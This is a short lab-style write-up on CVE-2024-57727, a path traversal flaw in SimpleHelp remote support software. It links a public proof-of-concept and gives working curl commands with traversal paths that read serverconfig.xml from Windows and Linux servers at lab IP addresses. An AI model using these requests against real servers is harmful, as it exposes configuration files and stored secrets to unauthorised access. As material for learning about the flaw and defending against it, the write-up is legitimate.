# Simplehelp CVE-2024-57727

[SimpleHelp](https://simple-help.com/) is a system that facilitates remote support, access, and work, among other uses. It is mainly used by IT professionals and support teams to allow them to support their users remotely. It can be installed on Linux, MS Windows, and macOS servers.

CVE-2024-57727 for SimpleHelp is a path traversal vulnerability.

After various vulnerabilities affecting other remote support and remote access software were discovered, Horizon3.ai was curious to check SimpleHelp’s software. In their [blog post](https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/), they state to have discovered three vulnerabilities: [CVE-2024-57726](https://nvd.nist.gov/vuln/detail/CVE-2024-57726), [CVE-2024-57727](https://nvd.nist.gov/vuln/detail/CVE-2024-57727), and [CVE-2024-57728](https://nvd.nist.gov/vuln/detail/CVE-2024-57728)

## Vulnerability Check

We can check this vulnerability by using this exploit <https://github.com/imjdl/CVE-2024-57727>

```python
python poc.py http://10.10.161.39
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FoXxSRu7zJCChAyhfazng%2Fimage.png?alt=media&#x26;token=5b69238c-50ca-464d-ae5e-89dce48e420e" alt=""><figcaption></figcaption></figure>

## Exploitation (Windows Server)

We can exploit this by getting serverconfig.xml file

```python
curl --path-as-is http://10.10.161.39/toolbox-resource/../resource1/../../configuration/serverconfig.xml
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FakTcbxQyeeUtG8sXnCCR%2Fimage.png?alt=media&#x26;token=de2c89c5-555b-45e7-b569-a22db60ebde1" alt=""><figcaption></figcaption></figure>

now we are able to access files on the server.

## Exploitation (Linux Server)

```
curl --path-as-is http://10.10.206.185/toolbox-resource/../secmsg/../../configuration/serverconfig.xml
```